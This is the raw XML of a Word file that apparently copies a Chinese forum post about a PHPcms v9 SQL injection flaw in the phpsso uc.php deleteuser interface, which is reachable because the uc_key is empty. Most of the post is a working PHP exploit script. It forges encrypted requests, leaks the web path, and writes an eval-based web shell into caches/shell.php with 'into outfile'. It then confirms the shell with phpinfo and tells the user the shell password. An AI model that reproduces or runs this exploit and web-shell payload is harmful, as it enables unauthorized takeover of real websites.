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B7" w:rsidRDefault="004654B7" w:rsidP="004654B7">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="6" w:color="CAD7E1"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F6F9FC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357082"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="357082"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="357082"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> HYPERLINK "http://bbs.wolvez.org/viewtopic.php?pid=890" \l "p890" </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="357082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2365B0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>2011-10-26 13:13:42</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="357082"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="004654B7" w:rsidRDefault="004654B7" w:rsidP="004654B7">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="6" w:color="CAD7E1"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F6F9FC"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="285" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="357082"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pP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漏洞分析：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1.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未启用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ucenter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服务的情况下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uc_key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为空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define('UC_KEY',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pc_base::load_config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('system', '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uc_key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'));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2.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deleteuser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接口存在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SQL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注入漏洞，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算法加密的参数无惧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GPC,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程序员未意识到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$get['ids']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会存在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SQL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注入情况。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    public function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deleteuser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($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get,$post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) {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br/>
        <w:t xml:space="preserve">       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pc_base::load_app_func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('global', 'admin');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br/>
        <w:t xml:space="preserve">       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pc_base::load_app_class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('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messagequeue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', 'admin' , 0);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br/>
        <w:t xml:space="preserve">        $ids =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new_stripslashes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($get['ids']);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br/>
        <w:t>        $s = $this-&gt;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member_db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-&gt;select("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ucuserid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 in ($ids)", "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uid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");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SQL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语句为</w:t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SELECT `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uid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` FROM `phpcmsv9`.`v9_sso_members` WHERE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ucuserid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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 in ($ids)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004654B7" w:rsidRPr="004654B7" w:rsidRDefault="004654B7" w:rsidP="004654B7">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004654B7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w:rsidR="004654B7" w:rsidRPr="004654B7" w:rsidRDefault="004654B7" w:rsidP="004654B7">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FCFDFE"/>
        <w:spacing w:line="285" w:lineRule="atLeast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利用代码，随便拼了个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EXP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，找路径正则写得很挫有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BUG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，没有注其他表了，懒得改了，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MYSQL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>有权限的话直接</w:t>
      </w:r>
      <w:r w:rsidRPr="004654B7">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">get </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004654B7">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>webshell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="004654B7" w:rsidRDefault="004654B7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia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&lt;?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print_r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('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---------------------------------------------------------------------------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PHPcms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(v9 or Old Version)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uc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api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sql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injection 0day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by rayh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4c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#80sec.com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---------------------------------------------------------------------------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');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 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argc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&lt;3)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print_r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('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---------------------------------------------------------------------------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Usage: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[0].' host path OPTIONS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host:      target server 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/hostname)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path:      path to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phpcms</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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Options: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-p[port]:    specify a port other than 80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-P[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ip:port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]: specify a proxy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Example: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[0].'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localhost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/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[0].'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localhost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/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phpcms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/ -p81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[0].'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localhost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/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phpcms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/ -P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1.1.1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.1:80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lastRenderedPageBreak/>
        <w:t>---------------------------------------------------------------------------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');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die;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error_reporting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(7);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ini_set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("max_execution_time",0);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ini_set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("default_socket_timeout",5);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function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quick_dump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$result='';$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='';$cont=0;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for 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=0;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&lt;=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strlen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($string)-1;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++)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if ((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 &lt;= 32 ) | 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 &gt; 126 ))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{$result.="  .";}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else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{$result.="  ".$string[$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if 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strlen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dechex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])))==2)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{$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.=" ".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dechex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]));}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else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{$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.=" 0".dechex(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]));}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cont++;if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($cont==15) {$cont=0; $result.="\r\n";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.="\r\n";}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return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exa."\r\n".$result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proxy_regex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'(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';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function send($packet)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global $proxy, $host, $port, $html,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proxy_regex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if ($proxy=='')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fsockopen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gethostbyname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($host),$port);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if (!$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echo 'No response from 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host.':'.$port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 die;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else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ab/>
        <w:t xml:space="preserve">$c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preg_match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proxy_regex,$proxy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if (!$c)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echo 'Not a valid proxy...';die;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$parts=explode(':',$proxy);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lastRenderedPageBreak/>
        <w:t xml:space="preserve">    $parts[1]=(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int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)$parts[1];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echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";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fsockopen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($parts[0],$parts[1]);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if (!$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echo 'No response from proxy...';die;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ab/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fputs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ock,$packet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if ($proxy=='')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$html='';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while (!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feof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$html.=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fgets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else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$html='';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while ((!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feof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)) or (!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eregi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chr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(0x0d).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chr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0a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).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chr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(0x0d).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chr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0a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),$html)))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$html.=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fread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($ock,1);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fclose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ock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$host=$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[1];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$path=$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[2];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$port=80;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$proxy="";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for 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=3;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&lt;$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argc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++){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$temp=$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][0].$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][1];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 ($temp=="-p")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$port=(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int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str_replace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("-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p","",$argv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 ($temp=="-P")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$proxy=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str_replace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("-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P","",$argv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 (($path[0]&lt;&gt;'/') or ($path[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strlen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($path)-1]&lt;&gt;'/')) {echo 'Error... check the path!'; die;}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 ($proxy=='') {$p=$path;} else {$p='http://'.$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host.':'.$port.$path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function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authcode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($string, $operation = 'DECODE', $key = '', $expiry = 0)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4;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$key = md5($key ? $key : '');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md5(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($key, 0, 16));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keyb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md5(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($key, 16, 16));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keyc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? ($operation == 'DECODE' ?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($string, 0,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):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(md5(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microtime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()), -$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)) : '';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cryptkey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$keya.md5($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keya.$keyc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strlen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cryptkey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$string = $operation == 'DECODE' ? base64_decode(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($string,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)) :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sprintf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('%010d', $expiry ? $expiry + time() : 0).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(md5($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string.$keyb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), 0, 16).$string;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string_length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strlen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$result = '';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$box = range(0, 255);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rndkey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array();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for($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0;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&lt;= 255;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++)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rndkey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]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cryptkey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%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for($j =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0;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&lt; 256;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++)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$j = ($j + $box[$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 +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rndkey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 % 256;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tmp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$box[$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$box[$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 = $box[$j];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$box[$j] =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tmp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for($a = $j =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0;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&lt;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string_length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++)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$a = ($a + 1) % 256;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$j = ($j + $box[$a]) % 256;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tmp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= $box[$a];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$box[$a] = $box[$j];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$box[$j] =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tmp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$result .=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chr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ord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($string[$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i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]) ^ ($box[($box[$a] + $box[$j]) % 256]));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if($operation == 'DECODE')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if((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($result, 0, 10) == 0 ||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($result, 0, 10) - time() &gt; 0) &amp;&amp;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($result, 10, 16) ==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(md5(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($result, 26).$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keyb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), 0, 16))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    return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substr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($result, 26);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} else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    return '';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 else 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    return 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keyc.str_replace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('=', '', base64_encode($result));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   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$SQL = "time=999999999999999999999999&amp;ids=1'&amp;action=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deleteuser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$SQL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urlencode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authcode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($SQL, "ENCODE", ""));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"[1]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访问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http://".$host.$p."phpsso_server/api/uc.php?code=".$SQL."\n";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 ="GET ".$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p."phpsso_server/api/uc.php?code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=".$SQL." HTTP/1.0\r\n";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$packet.="User-Agent: Mozilla/5.0\r\n";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$packet.="Host: ".$host."\r\n";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$packet.="Connection: Close\r\n\r\n";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send($packet);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strpos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html,"MySQL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Errno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") &gt; 0){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"[2]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发现存在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SQL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注入漏洞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"."\n";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"[3]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访问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http://".$host.$p."phpsso_server/api/logout.php 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 ="GET ".$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p."phpsso_server/api/logout.php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"." HTTP/1.0\r\n";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$packet.="User-Agent: Mozilla/5.0\r\n";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$packet.="Host: ".$host."\r\n";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$packet.="Connection: Close\r\n\r\n";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send($packet);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preg_match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('/[A-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Za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-z]?[:]?[\/\x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5c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][^&lt;^&gt;]+[\/\x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5c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]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phpsso_server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[\/\x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HTML0"/>
            <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
            <w:color w:val="FFFFFF"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
          </w:rPr>
          <w:t>5c</w:t>
        </w:r>
      </w:smartTag>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML0"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>]/',$html, $matches);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//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print_r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($matches);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if(!empty($matches)){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"[4]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得到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web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路径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" . $matches[0]."\n";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"[5]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尝试写入文件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".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str_replace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("\\","/",$matches[0]) ."caches/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shell.php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"."\n";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$SQL = "time=999999999999999999999999&amp;ids=1)";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$SQL.=" and 1=2 union select '&lt;?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eval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($"."_REQUEST[a]);?&gt;' into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outfile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'".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str_replace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("\\","/",$matches[0]) ."caches/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shell.php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'#";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$SQL.="&amp;action=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deleteuser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$SQL = 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urlencode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authcode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($SQL, "ENCODE", ""));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"[6]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访问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http://".$host.$p."phpsso_server/api/uc.php?code=".$SQL."\n";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 ="GET ".$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p."phpsso_server/api/uc.php?code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=".$SQL." HTTP/1.0\r\n";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$packet.="User-Agent: Mozilla/5.0\r\n";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$packet.="Host: ".$host."\r\n";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$packet.="Connection: Close\r\n\r\n";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send($packet);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strpos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html,"Access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denied") &gt; 0){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echo "[-] MYSQL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权限过低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禁止写入文件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:(";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die;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"[6]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访问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http://".$host.$p."phpsso_server/caches/shell.php"."\n";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 ="GET ".$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p."phpsso_server/caches/shell.php?a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phpinfo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(); HTTP/1.0\r\n";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$packet.="User-Agent: Mozilla/5.0\r\n";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$packet.="Host: ".$host."\r\n";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$packet.="Connection: Close\r\n\r\n";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send($packet);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if(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strpos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($html,"&lt;title&gt;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phpinfo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()&lt;/title&gt;") &gt; 0){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echo "[7] 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测试</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML0"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>phpinfo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML0"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>成功！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shell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密码是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a ! enjoy it :)";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}else{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echo "[-]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未取到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web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路径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 xml:space="preserve"> :(";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}else{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echo "[*]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不存在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SQL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注入漏洞</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML0"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"."\n";</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004654B7" w:rsidRDefault="004654B7" w:rsidP="004654B7">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:shd w:val="clear" w:color="auto" w:fill="333333"/>
        <w:spacing w:line="285" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rStyle w:val="HTML0"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML0"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004654B7" w:rsidRDefault="004654B7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="004654B7" w:rsidRPr="004654B7" w:rsidRDefault="004654B7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="004654B7" w:rsidRDefault="004654B7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="0046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4B7"/>
    <w:rsid w:val="004654B7"/>
    <w:rsid w:val="00EA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4654B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4654B7"/>
    <w:rPr>
      <w:color w:val="0000FF"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a4">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="a"/>
    <w:rsid w:val="004654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465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basedOn w:val="a0"/>
    <w:rsid w:val="004654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1043</Words>
  <Characters>5947</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>49</Lines>
  <Paragraphs>13</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company>China</Company>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>6977</CharactersWithSpaces>
  <SharedDoc>false</SharedDoc>
  <HLinks>
    <vt:vector size="6" baseType="variant"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http://bbs.wolvez.org/viewtopic.php?pid=890</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>p890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2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2018-08-14T08:56:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-08-14T08:56:00Z</dcterms:modified>
</cp:coreProperties>
</file>